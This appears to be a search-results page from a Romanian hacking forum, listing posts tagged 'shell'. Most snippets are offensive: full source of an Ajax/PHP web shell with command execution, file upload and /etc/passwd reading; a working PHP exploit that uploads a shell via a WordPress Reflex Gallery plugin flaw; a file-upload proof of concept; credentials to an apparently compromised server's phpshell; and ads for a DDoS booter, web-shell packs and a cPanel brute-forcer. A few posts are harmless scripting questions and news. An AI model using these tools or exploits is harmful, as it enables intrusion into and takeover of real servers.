Jump to content

Search the Community

Showing results for tags 'shell'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 16 results

  1. SEIZURE BOOTER 1.5.0 Features: Time out and port changing Setting Email Spoofer Site to IP File Pumper Cloudflare Resolver Extension Spoofer Boots Shell Its hitting about 700-800 mb Power. Download: DepositFiles
  2. Until now Unix and Linux system administrators have to download a third-party SSH client software like Putty on their Windows machines to securely manage their machines and servers remotely through Secure Shell protocol or Shell Session (better known as SSH). This might have always been an awkward feature of Windows platform, as it lacks both – a native SSH client software for connecting to Linux machines, and an SSH server to support inbound connections from Linux machines. But… Believe it or not: You don't need to deal with any third-party SSH client now, as Microsoft is working on supporting OpenSSH. Yes, Microsoft has finally decided to bring OpenSSH client and server to Windows. The PowerShell team at Microsoft has announced that the company is going to support and contribute to OpenSSH community in an effort to deliver better SSH support in the PowerShell and Windows SSH software solutions. So, the upcoming version of Windows PowerShell – the command-line shell and scripting language – will allow users to manage Windows and Linux computers through SSH. For those who are unaware, SSH is basically designed to offer the best security when accessing another computer remotely. It not only encrypts the remote session, but also provides better authentication facilities, with features like secure file transferring and network port forwarding. This is not first time Microsoft has planned to adopt SSH for its Windows platform, the company had tried to allow the secure shell protocol to be used within Windows twice but was unable to implement it. However, developers who are eager to use this new functionality in PowerShell still have to wait for some time, as the project is still in the early planning phase. So far, there isn’t any definite release date. The PowerShell team will update more information on when users can expect SSH support shortly. Source
  3. shadowSQLi

    1 shell

    ======================================= sdad › ???? 157.7.234.128 - phpshell [+]Username: shadow [+]Passowrd: rstforumseboss =======================================
  4. ################################################################################################## #Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility #Author : Manish Kishan Tanwar AKA error1046 #Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/ #Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip #Date : 9/04/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// file uploading code(uploader.php) in Windows Desktop and iPhone Photo Uploader plugin doesnt check for file extension before uploading it to server and hence vulnerable to arbitrary file upload //////////////// /// POC //// /////////////// Uploading PHP shell ================================= Just open uploader.php in plugin directory Access Denied browse your php shell and submit it. after uploading, you will get your shell in uploads directory at following location http://target.com/wp-content/uploads/i-dump-uploads/ demo:- 404 Not Found and upload your shell --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3 Source: http://packetstorm.wowhacker.com/1504-exploits/wpwdippu-upload.txt
  5. UnixSSH.com – Free shell server provider based on FreeBSD/OpenBSD/NetBSD/Solaris. On our servers you can run IRC bouncers, servers and bots. Also you can found many advanced and standard tools for programming or network diagnostics. Shell environment is very secure and protected from other users (home directory, process, etc.) Shell features: HDD: 400MB MySQL: 100MB RAM: 512MB VRAM: 3500MB Proc: 20 - You can run IRC bot, IRC server, Screen, tmux - Personal website and vhost username.unixssh.com - MySQL (local and remote access) - FTP access - SSH access to shell - Extensive programming environment (C, C++, Perl, Python, JAVA(1.6, 1.7), PHP, Mono) - A lot installed software on shell (Catalyst, Django, Zope, Pylons, Boost C++, nasm, Ruby, Ruby on Rails, Erlang, MongoDB, Apache Maven, Tcl, Lua, Oidentd, Node.js, rhodecode, midnight commander, links, curl, unzip, unrar, unarj, unace, wget, git, cvs, rsync, subversion etc. - irssi, epic5, weechat, screen, tmux, znc, eggdrop, oidentd, psybnc, etc For more information check out our site UnixSSH.com or create account now Host: unixssh.com Port: 44 SSH Login: newx Pass: newx
  6. <?php /* # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload # TIPE: Arbitrary File Upload # Google DORK: inurl:"wp-content/plugins/reflex-gallery/" # Vendor: https://wordpress.org/plugins/reflex-gallery/ # Tested on: Linux # Version: 3.1.3 (Last) # EXECUTE: php exploit.php www.alvo.com.br shell.php # OUTPUT: Exploit_AFU.txt # POC http://i.imgur.com/mpjXaZ9.png # REF COD http://1337day.com/exploit/23369 -------------------------------------------------------------------------------- <form method = "POST" action = "" enctype = "multipart/form-data" > <input type = "file" name = "qqfile"><br> <input type = "submit" name = "Submit" value = "Pwn!"> </form > -------------------------------------------------------------------------------- # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl/ # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); function __plus() { ob_flush(); flush(); } function __request($params) { $objcurl = curl_init(); curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03"); curl_setopt($objcurl, CURLOPT_POST, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => "@{$params['file']}")); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl) . __plus(); $info['server'] = curl_getinfo($objcurl) . __plus(); curl_close($objcurl) . __plus(); return $info; } echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n"; $params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO] DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")); __request($params) . __plus(); $_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}"; $_h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1); foreach ($_h as $key => $value) { echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n"; } $_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200')); print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL'); print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+] {$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) : '[-] ERROR!'); Source
  7. Nu stiu exact ce face , am gasito cred ca este pentru WP - SHell #!/usr/bin/perl # scanner # (c) Humax use LWP::UserAgent; use WWW::Mechanize; use threads; $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"); $ua->timeout(30); $defext = "php"; $| = 1; $threads = 5; head(); print "[+] Enter ip - site[(s) file] : "; $choice=<STDIN>; chomp($choice); if ($choice =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { print " + you're entering an ip address : ".$choice."\n"; dojob($choice); } elsif($choice =~ /\.txt/) { print " + you are entering a file : ".$choice."\n"; open(sites, "<".$choice) or $!; @paths)." - not found : http://".$_[0].$_[1]."/".$filescan.".".$fext; } } } print "\n"; } sub checkcommon { print " + scanning common files \n"; @cpaths = ("validator.php","uploader.php","vbseo.php","test.txt","test.zip","public_html.zip","pulic_html.rar","public_html.tar.gz","backup.zip","backup.tar.gz",".bash_history","error_log","domlogs"); $countcp=0; foreach $filecscan (@cpaths) { chomp($filecscan); $countcp++; $scanpc = $ua->get("http://".$_[0]."/".$filecscan); if ($scanpc->status_line !~ /404/){ if ($scanpc->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countcp."/".scalar(@cpaths)." + found : http://".$_[0]."/".$filecscan." ".$scanpc->status_line."\n"; } } else{ print "\r\t ".$countcp."/".scalar(@cpaths)." - not found : http://".$_[0]."/".$filecscan; } } print "\n"; } sub getjooken { $gjotoken = WWW::Mechanize->new(); $gjotoken->get("http://".$_[0]."/administrator/index.php"); if($gjotoken->content() =~ /([0-9a-fA-F]{32})/){ print " + found token \n"; chomp($1); return $1; } else { print " - can't get token \n"; next; } } sub savefile { open (save,">>".$_[0]); print save $_[1]."\n"; close save; } sub uniq { return keys %{{ map { $_ => 1 } @_ }}; } sub head { print qq { [+] scanner [+] (c) Humax } } https://www.sendspace.com/file/1xlza6
  8. Shell Scanner v1.o is a PHP shell detection script that will scan a server looking for web shells uploaded by other hackers. After locating the path to the shell you can choose the option to SAVE/DELETE. This is useful if you want to save private shells add a backdoor or remove their shit all together keeping full pwnage of the shelled target. Hidden or suspected Shells will be highlighted in blue Click on shell path and Save/Delete shell. Download : http://pastebin.com/bAN9ndkj
  9. Am si eu o problema legata de un script, el suna cam asa: Sa gasesc toate headerele care incep cu vocala din directorul /usr/src/linux-headers-3.13.0-34/include/ si subdirectoarele acestuia, iar apoi, sa le numar pe cele care nu includ headerul linux/err.h si din headerele pe care le includ, exact 3 sa nu se gaseasca in directorul linux/ sau in subdirectoarele acestuia. Pana, acum, eu am gandit asa : #! /bin/bash counter=0 for file in $(find /usr/src/linux-headers-3.13.0-34/include/ | grep /[aeiou][a-z0-9_]*[.][h]$); do found=$(cat $file | grep -o "^#include[ *]<linux/err.h>" | wc -l) if [[ "$found" -eq 0 ]]; then count=$((count+1)) fi done Prima data imi iau un contor = 0, apoi , gasesc in directorul cerut headerele care incep cu vocala. Apoi, cat timp sunt intr-unul din aceste fisiere, dau cat pe el pentru a avea acces la ce scrie in el, si numar daca nu cumva exista linux/err.h. Daca da, ce aam salvat in variabila found, ar trebui sa fie 1, si verific daca nu e > 0, iar daca da, cresc contorul. Sper ca am fost destul de explicit, va multumesc pentru atentie si ajutor!
  10. A script to work with many types of shells madShell. When adding a shell automatically checks availability and ability to execute shell commands. Now all the commands are executed by POST. In Shell List sorting it is possible to the parameters. Requires PHP + MySQL. Modes: Shell List Stats Add shells Command Execution Logs Automatically determines parameters such as: Safe Mode Platform Version Country Download: http://dl.dropbox.com/u/49340709/t00lz/madShellC0ntr01_v1.2.rar
  11. Hello Friends, I bring these tools I found on the net WebShells 1N73CTION Shell I-47 Shell Ani Shell Indrajith V.2 Shell WSO Shell by Orb Symlink WeeRoot Symlink Sa v3.0 Cpanel Brute Force MySql Interface Donwload: Mediafire || 4shared Password Zip: deface
  12. Buna ziua, Am de rezolvat 3 probleme, daca ati putea sa ma ajutati macar la una as fi recunoscator. 1.Unix Shell script care implementeza algoritmul bancherului pentru resurse multiple . 2.Unix Shell script care implementeza algoritmul NRU . 3.Unix Shell script care implementeza algoritmul LRU. Cu stima, lmn
  13. ~# shellhelp Ajax/PHP Command Shell © By Ironfist Version 0.7B The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you're not used to these commands, google a little. Custom Functions If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains 'func name' => 'javascript function'. Take a look at the built-in functions for examples. I know this readme isn't providing too much information, but hell, does this shell even require one - Iron <?php session_start(); error_reporting(0); $password = "password"; //Change this to your password $version = "0.7B"; $functions = array('Clear Screen' => 'ClearScreen()', 'Clear History' => 'ClearHistory()', 'Can I function?' => "runcommand('canirun','GET')", 'Get server info' => "runcommand('showinfo','GET')", 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 'Running processes' => "runcommand('ps -aux','GET')", 'Readme' => "runcommand('shellhelp','GET')" ); $thisfile = basename(__FILE__); $style = '<style type="text/css"> .cmdthing { border-top-width: 0px; font-weight: bold; border-left-width: 0px; font-size: 10px; border-left-color: #000000; background: #000000; border-bottom-width: 0px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #008000; font-family: verdana; border-right-width: 0px; border-right-color: #000000; } input,textarea { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #FFFFFF; background: #000000; border-bottom-width: 1px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #FFFFFF; font-family: verdana; border-right-width: 1px; border-right-color: #FFFFFF; } A:hover { text-decoration: none; } table,td,div { border-collapse: collapse; border: 1px solid #FFFFFF; } body { color: #FFFFFF; font-family: verdana; } </style>'; $sess = __FILE__.$password; if(isset($_POST['p4ssw0rD'])) { if($_POST['p4ssw0rD'] == $password) { $_SESSION[$sess] = $_POST['p4ssw0rD']; } else { die("Wrong password"); } } if($_SESSION[$sess] == $password) { if(isset($_SESSION['workdir'])) { if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) { chdir($_SESSION['workdir']); } } if(isset($_FILES['uploadedfile']['name'])) { $target_path = "./"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { } } if(isset($_GET['runcmd'])) { $cmd = $_GET['runcmd']; print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>"; if($cmd == "") { print "Empty Command..type \"shellhelp\" for some ehh...help"; } elseif($cmd == "upload") { print '<br>Uploading to: '.realpath("."); if(is_writable(realpath("."))) { print "<br><b>I can write to this directory</b>"; } else { print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>"; } } elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) { if(file_exists($file[1]) && is_dir($file[1])) { chdir($file[1]); $_SESSION['workdir'] = $file[1]; print "Current directory changed to ".$file[1]; } else { print "Directory not found"; } } elseif(strtolower($cmd) == "shellhelp") { print '<b><font size=7>Ajax/PHP Command Shell</b></font> © By Ironfist The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re not used to these commands, google a little. <b>Custom Functions</b> If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains \'func name\' => \'javascript function\'. Take a look at the built-in functions for examples. I know this readme isn\'t providing too much information, but hell, does this shell even require one - Iron '; } elseif(ereg("editfile (.*)",$cmd,$file)) { if(file_exists($file[1]) && !is_dir($file[1])) { print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">"; $contents = file($file[1]); foreach($contents as $line) { print htmlspecialchars($line); } print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } else { print "File not found."; } } elseif(ereg("deletefile (.*)",$cmd,$file)) { if(is_dir($file[1])) { if(rmdir($file[1])) { print "Directory succesfully deleted."; } else { print "Couldn't delete directory!"; } } else { if(unlink($file[1])) { print "File succesfully deleted."; } else { print "Couldn't delete file!"; } } } elseif(strtolower($cmd) == "canirun") { print "If any of these functions is Enabled, the shell will function like it should.<br>"; if(function_exists(passthru)) { print "Passthru: <b><font color=green>Enabled</b></font><br>"; } else { print "Passthru: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(exec)) { print "Exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Exec: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(system)) { print "System: <b><font color=green>Enabled</b></font><br>"; } else { print "System: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(shell_exec)) { print "Shell_exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Shell_exec: <b><font color=red>Disabled</b></font><br>"; } print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>"; if( ini_get('safe_mode') ){ print "Safe Mode: <b><font color=red>Enabled</b></font>"; } else { print "Safe Mode: <b><font color=green>Disabled</b></font>"; } print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>"; if( ini_get('open_basedir') ){ print "Open_basedir: <b><font color=red>Enabled</b></font>"; } else { print "Open_basedir: <b><font color=green>Disabled</b></font>"; } } //About the shell elseif(ereg("listdir (.*)",$cmd,$directory)) { if(!file_exists($directory[1])) { die("Directory not found"); } //Some variables chdir($directory[1]); $i = 0; $f = 0; $dirs = ""; $filez = ""; if(!ereg("/$",$directory[1])) //Does it end with a slash? { $directory[1] .= "/"; //If not, add one } print "Listing directory: ".$directory[1]."<br>"; print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>"; if ($handle = opendir($directory[1])) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $dirs[$i] = $file; $i++; } else { $filez[$f] = $file; $f++; } } print "<td>"; foreach($dirs as $directory) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>"; } print "</td><td>"; foreach($filez as $file) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>"; } print "</td></table>"; } } elseif(strtolower($cmd) == "about") { print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version"; } //Show info elseif(strtolower($cmd) == "showinfo") { if(function_exists(disk_free_space)) { $free = disk_free_space("/") / 1000000; } else { $free = "N/A"; } if(function_exists(disk_total_space)) { $total = trim(disk_total_space("/") / 1000000); } else { $total = "N/A"; } $path = realpath ("."); print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>"; if(function_exists(passthru)) { passthru("uname -a"); } else { print "Passthru is disabled :("; } } //Read /etc/passwd elseif(strtolower($cmd) == "etcpasswdfile") { $pw = file('/etc/passwd/'); foreach($pw as $line) { print $line; } } //Execute any other command else { if(function_exists(passthru)) { passthru($cmd); } else { if(function_exists(exec)) { exec("ls -la",$result); foreach($result as $output) { print $output."<br>"; } } else { if(function_exists(system)) { system($cmd); } else { if(function_exists(shell_exec)) { print shell_exec($cmd); } else { print "Sorry, none of the command functions works."; } } } } } } elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) { $file = $_POST['filetosave']; if(!is_writable($file)) { if(!chmod($file, 0777)) { die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message } } $fh = fopen($file, 'w'); $dt = $_POST['filecontent']; fwrite($fh, $dt); fclose($fh); } else { ?> <html> <title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title> <head> <?php print $style; ?> <SCRIPT TYPE="text/javascript"> function sf(){document.cmdform.command.focus();} var outputcmd = ""; var cmdhistory = ""; function ClearScreen() { outputcmd = ""; document.getElementById('output').innerHTML = outputcmd; } function ClearHistory() { cmdhistory = ""; document.getElementById('history').innerHTML = cmdhistory; } function deletefile(file) { deleteit = window.confirm("Are you sure you want to delete\n"+file+"?"); if(deleteit) { runcommand('deletefile ' + file,'GET'); } } var http_request = false; function makePOSTRequest(url, parameters) { http_request = false; if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function SaveFile() { var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) + "&filecontent=" + encodeURI( document.getElementById("area1").value ); makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr); document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly."; } function runcommand(urltoopen,action,contenttosend){ cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory; document.getElementById('history').innerHTML = cmdhistory; if(urltoopen == "clear") { ClearScreen(); } var ajaxRequest; try{ ajaxRequest = new XMLHttpRequest(); } catch (e){ try{ ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try{ ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ alert("Wicked error, nothing we can do about it..."); return false; } } } ajaxRequest.onreadystatechange = function(){ if(ajaxRequest.readyState == 4){ outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>"; document.getElementById('output').innerHTML = outputcmd; var objDiv = document.getElementById("output"); objDiv.scrollTop = objDiv.scrollHeight; } } ajaxRequest.open(action, "?runcmd="+urltoopen , true); if(action == "GET") { ajaxRequest.send(null); } document.cmdform.command.value=''; return false; } function set_tab_html(newhtml) { document.getElementById('commandtab').innerHTML = newhtml; } function set_tab(newtab) { if(newtab == "cmd") { newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>'; } else if(newtab == "upload") { runcommand('upload','GET'); newhtml = '<font size=0><b>This will reload the page... </b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>'; } else if(newtab == "workingdir") { <?php $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\""; $pathparts = explode("/",realpath (".")); foreach($pathparts as $folder) { $folders .= $folder."/"; } $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>"; ?> newhtml = '<?php print $folders; ?>'; } else if(newtab == "filebrowser") { newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory'; runcommand('listdir .','GET'); } else if(newtab == "createfile") { newhtml = '<b>File Editor, under construction.</b>'; document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } document.getElementById('commandtab').innerHTML = newhtml; } </script> </head> <body bgcolor=black onload="sf();" vlink=white alink=white link=white> <table border=1 width=100% height=100%> <td width=15% valign=top> <form name="extras"><br> <center><b>Quick Commands</b><br> <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'> <?php foreach($functions as $name => $execute) { print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>'; } ?> </center> </div> </form> <center><b>Command history</b><br></center> <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div> <br> <center><b>About</b><br></center> <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'> <br> <b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist <br> Version <?php print $version; ?> <br> <br> <br>Thanks to everyone @ <a href="http://www.ironwarez.info" target=_blank>SharePlaza</a> <br> <a href="http://www.milw0rm.com" target=_blank>milw0rm</a> <br> and special greetings to everyone in rootshell </div> </td> <td width=70%> <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0> <b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> <b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> <b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> </font></td> <tr> <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div> <tr> <td height=1% width=100% valign=top> <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'> <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');"> <b>Command</b>: <input type=text name=command class=cmdthing size=100%><br> </form> </div> </td> </table> </td> </table> </body> </html> <?php } } else { print "<center><table border=0 height=100%> <td valign=middle> <form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\"> </form>"; } ?>
  14. Acest script cross-platform permite rularea unei comenzi batch/bash cu parametri variabili preluati din fisiere text, linie cu linie. Am simtit nevoia sa fac ceva mai general tocmai din cauza multor subiecte si cereri pe tema asta. Indiferent cate comenzi veti executa tot outputul e afisat in timp real in aceeasi consola (sau si intr-un fisier) fara sa se amestece (se presupune a folosi comenzi de aceeasi speta ce genereaza un output calitativ nu cantitativ), iar preluarea comenzilor este foarte stabila, respecta cu strictete numarul threadurilor alocate si ordinea in functie de timpi. Codul este pur Python, pana si executarea comenzilor se face in procese separate independente de terminal, ceea ce previne shell injection si alte neplaceri cu restrictia unor "smenuri" tipice bash, dar acest comportament poate fi schimbat prin modificarea si adaugarea unui argument din clasa Popen, oricum nu intru in amanunte, fiindca e in afara scopului si nici nu cred ca va veti lovi de problema asta. Foloseste Python 2.x, testat pe windows 7 si backtrack cu un script simplu ca: #include <stdio.h> #include <time.h> #include <windows.h> #define N 10 /* N phases */ int main(int argc, char* argv[]) { int i; for (i = 0; i < N; ++i) { printf("Process %s with %s at phase %d.\n", argv[1], argv[2], i); fflush(stdout); Sleep(1000); /* replace with sleep(1) on posix */ } return 0; } Parametrii de test luati din 2 fisiere prin linia: run.py -t 2 -d 0.5 scan.exe @a.txt @b.txt P.S.: Atentie la output, imaginati-va putin cam cum va arata ceea ce urmeaza sa faceti ca sa nu aveti surprize. cd in folderul cu scriptul chmod +x ./run.py ./run.py -> vezi usage http://codepad.org/tn3Xwohw #! /usr/bin/env python # Shell Multi Runner # 12.02.2012 cmiN # # Execute commands in terminal asynchronously using subprocess # and show all output merged into one console. # # Contact: cmin764@yahoo/gmail.com import subprocess # better than popen/system/respawn from sys import argv, stdout from time import sleep from threading import active_count, Thread # parallelism # some settings FILE = None # output to file too THRD = 10 # threads DLAY = 1 # delay CHAR = '@' # wildcard # instantiated in only one object class Show(file): """ Thread safe printing class. Uses primitive locks. """ def __init__(self, fname=None): """ If `fname` isn't `None` write output to file too. """ self.locked = False # unlocked self.open_file(fname) def __del__(self): """ Destructor. Close an opened file. """ if self.fname: self.close() def open_file(self, fname): """ Open file for writing. """ self.fname = fname if fname: # init file super(Show, self).__init__(fname, 'w') def write(self, data): """ Safe write. """ while self.locked: # if writing in progress pass # wait # lock self.locked = True # write data if self.fname: super(Show, self).write(data) stdout.write(data) # flush data if self.fname: self.flush() stdout.flush() # release self.locked = False def fileno(self): """ Experimental. Used as file descriptor replacing pipes. """ if self.fname: return super(Show, self).fileno() return stdout.fileno() class 